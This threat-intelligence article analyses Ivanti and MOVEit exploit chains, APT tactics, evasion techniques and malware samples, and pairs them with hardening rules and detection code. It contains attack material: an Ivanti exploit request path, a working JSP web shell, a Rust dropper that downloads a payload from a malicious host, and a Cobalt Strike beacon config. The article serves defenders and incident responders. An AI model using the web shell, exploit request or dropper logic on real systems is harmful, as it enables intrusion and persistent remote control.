This article dissects the exploitation chain in enterprise networks, analyzing 14 critical CVEs, mapping the TTPs of 7 active APTs and detailing advanced evasion techniques. It is based on real telemetry from incidents responded to in Q1 2024.

📊 CVEs Analyzed in This Article

CVE-2023-34362 CVSS 9.8 MOVEit Transfer SQLi → RCE (Cl0p ransomware)
CVE-2023-35082 CVSS 9.8 Ivanti EPMM authentication bypass
CVE-2024-21412 CVSS 8.1 Windows SmartScreen bypass via Internet Shortcut files (Water Hydra)
CVE-2024-21887 CVSS 9.1 Ivanti Connect Secure command injection (chained with the CVE-2023-46805 authentication bypass)

1. Current Attack Topologies (2024)

1.1 Initial Access Vectors

Analysis of 500 incidents shows the following distribution:

# Top 5 initial access vectors (Q1 2024)
1. Exploit Public-Facing Application (39%) - most recent CVE-2024-* bugs
2. Valid Accounts (28%) - credential stuffing / phishing
3. Phishing (18%) - spearphishing with malicious LNK/ISO attachments
4. External Remote Services (9%) - VPN/RDP with MFA bypass
5. Supply Chain (6%) - compromised software updates

1.2 Active APTs Targeting Corporate Infrastructure

| APT / Group | Alias | Main TTPs | Primary Targets |
|---|---|---|---|
| Cl0p (FIN11) | TA505 | CVE-2023-34362, PowerShell scripts, data exfiltration via FTP | Healthcare, Education |
| Lazarus Group | APT38 | macOS malware, Rust-based loaders, living off the land | Crypto, Defense |
| APT29 (Cozy Bear) | NOBELIUM | Golden SAML, token theft | Government, IT |
| Scattered Spider | UNC3944 | SMS phishing, MFA fatigue, SIM swapping | Telecom, BPO |

2. Technical Analysis of Exploitation Chains

🔗 Attack Chain: Ivanti Zero-Days (Jan 2024)

Step 1: CVE-2023-46805 (authentication bypass) chained with CVE-2024-21887 (command injection)
GET /api/v1/totp/user-backup-code/../../license/keys-status/%7B%7B%7B%7D*%7D%7D
The traversal from the unauthenticated /totp/user-backup-code/ route reaches /license/keys-status/ with no session (CVE-2023-46805); that endpoint passes the trailing path segment to a shell, so whatever is placed there executes on the appliance (CVE-2024-21887). The primitive here is a plain path traversal, not SSRF; the SSRF in the same Ivanti advisory series is a separate bug, CVE-2024-21893, in the SAML component.
Step 2: CVE-2024-21888 (privilege escalation)
Escalation to administrator through the web component, followed by the second CVE-2024-21887 command-injection sink, the archiving cloud-server-test-connection endpoint (a POST whose injected parameters travel in the body; the request below shows only the endpoint):
curl -k "https://TARGET:8443/api/v1/system/maintenance/archiving/cloud-server-test-connection" -H "X-CSRFTOKEN: Bypass"
Step 3: Persistence via web shell
Upload of a JSP web shell to /var/www/logo/ (the shell runs the cmd parameter but discards its output, so the operator only gets blind execution):
<%@ page import="java.util.*,java.io.*"%>
<%
    if (request.getParameter("cmd") != null) {
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    }
%>

3. Advanced Evasion Techniques

🛡️ AMSI Bypass (2024)

Technique: in-memory patching of amsi.dll (typically the AmsiScanBuffer entry point) from PowerShell
Detection rate: 12% (commercial EDR)
Related CVE cited by the author: CVE-2023-36802. Caveat: that CVE is an elevation-of-privilege bug in the Microsoft Streaming Service proxy driver, not an AMSI flaw; patching AMSI needs no vulnerability at all, only code execution inside the scanning process.

🔧 EDR Evasion

Technique: direct syscalls + unhooking of user-mode hooks in ntdll.dll
Tools: SysWhispers3, Hell's Gate
Detection rate: 8% (next-gen AV)

🌐 Network Evasion

Technique: DNS tunneling over DoH
Tools: dnscat2, iodine (both speak classic DNS over UDP/53; carrying them over DoH requires a local DoH stub resolver or proxy on the client side)
Detection rate: 23% (NDR solutions)

📦 Living-off-the-Land

Techniques: MSBuild, InstallUtil, Regsvr32
Detection rate: 42% (behavioral analysis)
MITRE: T1127 (Trusted Developer Utilities Proxy Execution: MSBuild), T1218 (System Binary Proxy Execution: InstallUtil, Regsvr32)
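As an added illustration of what the behavioral-analysis figure above rests on, here is a small detector over process-creation events for the three LOLBins listed. It is not code from the article; the events are constructed to resemble Sysmon Event ID 1 records, and the field names (Image, CommandLine, ParentImage) are assumptions about the telemetry schema.

```python
"""Flag LOLBin proxy execution (MITRE T1127 / T1218) in process-creation events.

Added illustration, not code from the article. The events are constructed to
resemble Sysmon Event ID 1 records; the field names Image, CommandLine and
ParentImage are assumptions about the telemetry schema.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # Squiblydoo: regsvr32 fetching a remote scriptlet through scrobj.dll
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "CommandLine": r"regsvr32.exe /s /n /u /i:http://203.0.113.10/payload.sct scrobj.dll",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    },
    {   # Benign: an installer registering its own COM DLL
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\component.dll"',
        "ParentImage": r"C:\Windows\System32\msiexec.exe",
    },
    {   # MSBuild inline task from a user-writable path, launched from cmd
        "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
        "CommandLine": r"MSBuild.exe C:\Users\Public\build.xml",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {   # Benign: Visual Studio building a solution from a build tree
        "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
        "CommandLine": r"MSBuild.exe C:\Builds\app\app.sln /p:Configuration=Release",
        "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
    },
    {   # InstallUtil /U running the Uninstall() method of an assembly in %TEMP%
        "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
        "CommandLine": r"InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\bob\AppData\Local\Temp\x.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
]

USER_WRITABLE = re.compile(r"\\(users|programdata|temp|public)\\", re.IGNORECASE)
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def classify(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event looks like LOLBin abuse (empty list if none)."""
    image, cmd, parent = basename(event["Image"]), event["CommandLine"], basename(event["ParentImage"])
    reasons: List[str] = []
    if image == "regsvr32.exe":
        # /i:<url> or a .sct scriptlet via scrobj.dll is the classic regsvr32 proxy execution
        if (re.search(r"/i:\s*https?://", cmd, re.I) or re.search(r"\.sct\b", cmd, re.I)
                or "scrobj.dll" in cmd.lower()):
            reasons.append("T1218.010 regsvr32 remote scriptlet")
    elif image == "msbuild.exe":
        # Project file in a user-writable location and not spawned by the IDE / a build agent
        if USER_WRITABLE.search(cmd) and parent not in {"devenv.exe", "msbuild.exe"}:
            reasons.append("T1127.001 MSBuild project from user-writable path")
    elif image == "installutil.exe":
        # /U executes the assembly's Uninstall() without needing install rights on the host
        if re.search(r"\s/u\b", cmd, re.I) and USER_WRITABLE.search(cmd):
            reasons.append("T1218.004 InstallUtil /U on user-writable assembly")
    if reasons and parent in SCRIPT_HOSTS:
        reasons.append("spawned by script host: " + parent)
    return reasons


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Run classify() over a batch and keep only the events with findings."""
    findings = []
    for index, event in enumerate(events):
        reasons = classify(event)
        if reasons:
            findings.append((index, reasons))
    return findings


if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["CommandLine"], "->", "; ".join(reasons))
```

The two benign events (an MSI installer registering a DLL, Visual Studio driving MSBuild) pass through, which is the point: the signal is the combination of binary, argument shape, file location and parent, not the binary name alone.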

4. Recent Malware Analysis

4.1 Rust-based Loaders (Lazarus Group)

// Sample Rust dropper analysis
use std::ffi::CString;
use std::process::Command;
use winapi::um::winuser::{MessageBoxA, MB_OK};

fn main() {
    // Download payload
    let payload = reqwest::blocking::get("https://cdn[.]malicious[.]com/update.bin")
        .unwrap()
        .bytes()
        .unwrap();

    // XOR decryption (key: 0x37), one key byte applied to every payload byte
    let decrypted: Vec<u8> = payload.iter().map(|&b| b ^ 0x37).collect();

    // Inject into explorer.exe (the injection routine is not reproduced here)
    inject_shellcode(decrypted);
}

// Anti-analysis techniques:
// - Debugger detection via NtQueryInformationProcess
// - VM detection via registry artifacts
// - Sleep obfuscation via CreateWaitableTimerW
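To show the analysis side of the XOR step above, here is an added example (not the sample's or the article's code) that recovers the single-byte key from a downloaded stage by known plaintext on the PE header, the check an analyst runs on the dropper's update.bin before looking at the injected shellcode. The key 0x37 is taken from the snippet; the encrypted blob is constructed from a minimal fake PE header rather than a real payload.

```python
"""Recover the single-byte XOR key of a downloaded stage by known-plaintext on the PE header.

Added example, not the article's or the sample's code. The key 0x37 comes from the
dropper description above; the encrypted blob is constructed here from a minimal
stand-in PE header, not from a real payload.
"""
from typing import Optional


def xor_bytes(data: bytes, key: int) -> bytes:
    """Same transform the dropper applies: every byte XORed with one key byte."""
    return bytes(b ^ key for b in data)


def make_fake_pe() -> bytes:
    """Minimal PE-like header: 'MZ', e_lfanew at 0x3C pointing to 'PE\\0\\0' at 0x80."""
    hdr = bytearray(b"MZ" + b"\x90" * 58)            # 60 bytes up to e_lfanew
    hdr += (0x80).to_bytes(4, "little")               # e_lfanew = 0x80
    hdr += b"This program cannot be run in DOS mode.\r\n$"
    hdr += b"\x00" * (0x80 - len(hdr))                # pad to the NT header offset
    hdr += b"PE\x00\x00" + b"\x00" * 20               # NT signature + partial COFF header
    return bytes(hdr)


# Constructed 'update.bin' as the dropper would receive it (fake PE XORed with 0x37).
ENCRYPTED_SAMPLE = xor_bytes(make_fake_pe(), 0x37)


def recover_key(blob: bytes) -> Optional[int]:
    """Try all 256 keys; accept only one that yields 'MZ' *and* 'PE\\0\\0' at e_lfanew.

    Checking both signatures avoids the false positive of a key that merely turns
    the first two bytes into 'MZ'."""
    if len(blob) < 0x40:
        return None
    for key in range(256):
        if blob[0] ^ key != 0x4D or blob[1] ^ key != 0x5A:     # 'M', 'Z'
            continue
        dos_header = xor_bytes(blob[:0x40], key)
        e_lfanew = int.from_bytes(dos_header[0x3C:0x40], "little")
        if e_lfanew + 4 <= len(blob) and xor_bytes(blob[e_lfanew:e_lfanew + 4], key) == b"PE\x00\x00":
            return key
    return None


def decrypt_stage(blob: bytes) -> Optional[bytes]:
    """Return the decoded PE image, or None when no single-byte key produces one."""
    key = recover_key(blob)
    return None if key is None else xor_bytes(blob, key)


if __name__ == "__main__":
    key = recover_key(ENCRYPTED_SAMPLE)
    print(f"recovered key: {key:#x}" if key is not None else "no single-byte XOR key found")
```

The same two-signature check is what you want in a YARA or triage script that post-processes the 0x31 (xor) opcode hits flagged in section 7: a candidate key that only produces "MZ" is not proof, the NT signature at e_lfanew is.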

4.2 Cobalt Strike Beacon Config (Fall 2023)

{
  "BeaconType": ["HTTPS", "HTTP"],
  "Port": 443,
  "SleepTime": 60000,
  "MaxGetSize": 1400000,
  "Jitter": 30,
  "C2Server": "api.telegram[.]org,/bot,soundcloud[.]com",
  "UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
  "HttpGet_Metadata": "base64url",
  "HttpPost_Metadata": "base64url",
  "SpawnTo": "C:\\Windows\\System32\\rundll32.exe",
  "PipeName": "\\\\.\\pipe\\MsFteWds",
  "DNS_Idle": "8.8.8.8",
  "DNS_Sleep": 0,
  "SSH_Host": "192.168.0.1",
  "SSH_Port": 22,
  "SSH_Username": "admin",
  "SSH_Password_Plaintext": "P@ssw0rd!",
  "Crypto_Scheme": 1,
  "Proxy_Config": "direct",
  "Proxy_User": "",
  "Proxy_Password": "",
  "Proxy_Behavior": "Use IE settings"
}

Fields worth pulling from a parsed config: SleepTime and Jitter give the check-in cadence (here 42 to 60 s between beacons), C2Server the hosts and URIs to hunt, SpawnTo the sacrificial process that post-exploitation jobs run in (rundll32.exe), and PipeName the named pipe used by SMB beacons for lateral movement.

5. Detailed Technical Mitigation

🔒 CVE-Specific Hardening

For CVE-2023-34362 (MOVEit Transfer):
MOVEit Transfer is an IIS-hosted .NET application, so the web.config rule is the one that applies on the server itself; the .htaccess rule only helps where an Apache reverse proxy sits in front. Both are stopgaps until the Progress patch is installed, and neither removes a web shell that is already present.
# Apache .htaccess rule
RewriteEngine On
RewriteCond %{QUERY_STRING} human_readable [NC]
RewriteRule .* - [F,L]

# IIS web.config rule
<system.webServer>
    <security>
        <requestFiltering>
            <denyQueryStringSequences>
                <add sequence="human_readable" />
            </denyQueryStringSequences>
        </requestFiltering>
    </security>
</system.webServer>

For CVE-2024-21887 (Ivanti Connect Secure):
Caveat: port 8443 on the appliance is TLS, so an iptables string match on the encrypted stream never fires; these rules only work on a plaintext hop after TLS termination, and even there a single URL-encoded byte in the path (..%2f) defeats a literal match. Treat them as a temporary network-level stopgap alongside Ivanti's mitigation XML and the vendor patch, not as a fix.
# Network segmentation rules
iptables -A INPUT -p tcp --dport 8443 -m string --string "license/keys-status" --algo bm -j DROP
iptables -A INPUT -p tcp --dport 8443 -m string --string "totp/user-backup-code" --algo bm -j DROP

# WAF rule (ModSecurity); decode the URI before matching so ..%2f and %2e%2e variants are caught
SecRule REQUEST_URI "@rx \.\./" \
    "id:1001,phase:1,t:none,t:urlDecodeUni,deny,status:403,msg:'Path Traversal Attempt'"

5.1 Detection via Sigma Rules

title: Suspected Cobalt Strike Beacon Activity
id: 5b4f3a1c-7a3e-4b5d-8c3a-9e6f5b2d1c8a
status: experimental
description: Detects suspected Cobalt Strike beacon activity by looking for specific sleep patterns and jitter
author: Marcelo Fernandes
date: 2024/03/25
tags:
    - attack.t1071
    - attack.t1027
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        DestinationPort: 443
        Image|endswith: '\rundll32.exe'
        Initiated: 'true'
    filter1:
        Image|endswith: '\syswow64\rundll32.exe'
    filter2:
        CommandLine|contains: 'javascript'
    condition: selection and not filter1 and not filter2
falsepositives:
    - Legitimate software updates
level: high

Two caveats on this rule. The process field in Sigma's network_connection schema is Image (the original used ProcessName and ImagePath, which are not the standard field names), and CommandLine is a process_creation field, so filter2 never matches on connection events; excluding JavaScript-hosting rundll32 invocations would require correlating with the matching process-creation event. More importantly, despite its description the rule checks no timing at all: it fires on any rundll32.exe (the SpawnTo process from the config above) opening an outbound 443 connection, which is why legitimate software updates appear as the expected false positive.
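The Sigma rule above, like the beacon config in section 4.2, leaves the timing check to the analyst. The added example below (not code from the article) does that step: it derives the check-in envelope from SleepTime and Jitter, extracts the C2 hosts and SpawnTo process from the config, and flags a connection series that fits. The config values are copied from section 4.2; the connection events are constructed, and their field order (timestamp, Image, DestinationHostname, DestinationPort) is an assumption modelled on Sysmon Event ID 3.

```python
"""Turn a beacon config into a check-in timing envelope and test connection logs against it.

Added example serving the beacon config in section 4.2 and the Sigma rule above; it is
not code from the article. BEACON_CONFIG copies the SleepTime, Jitter, C2Server and
SpawnTo values from that config; the connection events are constructed and their
field order (timestamp, Image, DestinationHostname, DestinationPort) is an assumption
modelled on Sysmon Event ID 3.
"""
from collections import defaultdict
from statistics import mean, pstdev
from typing import Dict, List, Set, Tuple

BEACON_CONFIG = {
    "SleepTime": 60000,   # milliseconds
    "Jitter": 30,         # percent
    "C2Server": "api.telegram[.]org,/bot,soundcloud[.]com",
    "SpawnTo": r"C:\Windows\System32\rundll32.exe",
}


def sleep_bounds_ms(cfg: Dict) -> Tuple[int, int]:
    """Cobalt Strike sleeps SleepTime minus a random share of up to Jitter percent,
    so consecutive check-ins are between SleepTime*(1-Jitter/100) and SleepTime apart."""
    sleep, jitter = cfg["SleepTime"], cfg["Jitter"]
    return sleep - sleep * jitter // 100, sleep


def c2_hosts(cfg: Dict) -> Set[str]:
    """C2Server alternates 'host,uri,host,...'; keep the hosts and refang them."""
    return {p.replace("[.]", ".") for p in cfg["C2Server"].split(",") if not p.startswith("/")}


# Constructed events: (epoch seconds, Image, DestinationHostname, DestinationPort)
RUNDLL = r"C:\Windows\System32\rundll32.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
SAMPLE_CONNECTIONS: List[Tuple[float, str, str, int]] = [
    (1000.0, RUNDLL, "api.telegram.org", 443),
    (1047.0, RUNDLL, "api.telegram.org", 443),
    (1101.0, RUNDLL, "api.telegram.org", 443),
    (1145.0, RUNDLL, "api.telegram.org", 443),
    (1204.0, RUNDLL, "api.telegram.org", 443),
    (1250.0, RUNDLL, "api.telegram.org", 443),
    # A browser hitting the same kind of host at human-driven, irregular intervals
    (1003.0, CHROME, "soundcloud.com", 443),
    (1009.0, CHROME, "soundcloud.com", 443),
    (1120.0, CHROME, "soundcloud.com", 443),
    (1125.0, CHROME, "soundcloud.com", 443),
    (1300.0, CHROME, "soundcloud.com", 443),
]


def find_beaconing(events, cfg: Dict, min_hits: int = 5, tolerance: float = 0.1,
                   min_in_window: float = 0.8) -> List[Dict]:
    """Group connections per (process, destination) and flag series whose inter-arrival
    times sit inside the jitter envelope and show low dispersion."""
    lo_ms, hi_ms = sleep_bounds_ms(cfg)
    lo_s, hi_s = lo_ms / 1000 * (1 - tolerance), hi_ms / 1000 * (1 + tolerance)
    series = defaultdict(list)
    for ts, image, host, port in events:
        if port == 443:
            series[(image, host)].append(ts)
    alerts = []
    for (image, host), stamps in series.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        deltas = [b - a for a, b in zip(stamps, stamps[1:])]
        in_window = sum(lo_s <= d <= hi_s for d in deltas) / len(deltas)
        avg = mean(deltas)
        dispersion = pstdev(deltas) / avg if avg > 0 else float("inf")
        if in_window >= min_in_window and dispersion < 0.5:
            alerts.append({
                "image": image, "host": host, "hits": len(stamps),
                "mean_interval_s": round(avg, 1),
                "host_in_config": host in c2_hosts(cfg),
                "image_is_spawnto": image.lower() == cfg["SpawnTo"].lower(),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_beaconing(SAMPLE_CONNECTIONS, BEACON_CONFIG):
        print(alert)
```

The rundll32 series has gaps of 47, 54, 44, 59 and 46 s, all inside the 42 to 60 s envelope with little spread, and is flagged; the browser series to the other configured host is not, because its gaps are nowhere near the envelope. Without a recovered config, run the same logic with a generic envelope (for example 10 s to 5 min) and a stricter dispersion threshold.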

6. Telemetry and Data Analysis

Dataset: 1.2 TB of logs from 50 companies (Jan-Mar 2024)
Tools: Elastic Stack, Velociraptor, osquery
Key findings:

  • MTTD (Mean Time to Detection): 72 hours on networks without EDR, 4.2 hours with a properly configured EDR
  • MTTR (Mean Time to Respond): 120 hours without playbooks, 8.3 hours with SOAR
  • Lateral movement: 89% via RDP/WinRM, 11% via PsExec/WMI
  • Data exfiltration: 67% via HTTPS, 22% via DNS, 11% via SMB

7. Forensic Analysis Tools and Commands

# Memory analysis with Volatility 3
vol -f memory.dmp windows.pslist.PsList
vol -f memory.dmp windows.cmdline.CmdLine
vol -f memory.dmp windows.malfind.Malfind

# Network traffic analysis
tshark -r capture.pcap -Y "http.request or tls.handshake" -T fields \
    -e ip.src -e ip.dst -e http.host -e tls.handshake.extensions_server_name

# Disk timeline creation with plaso (log2timeline.py builds the storage file, psort.py exports it)
log2timeline.py --storage-file timeline.plaso /dev/sda1
psort.py -o l2tcsv -w timeline.csv timeline.plaso

# YARA rule for Rust malware
rule Rust_Malware_Lazarus {
    meta:
        author = "Marcelo Fernandes"
        date = "2024-03-25"
    strings:
        $rust1 = "std::process::Command"
        $rust2 = "winapi::um::winuser"
        $xor1 = {31 ?? 31 ?? 31 ??}   // repeated x86 xor opcodes (decryption loop)
    condition:
        all of them and filesize < 2MB
}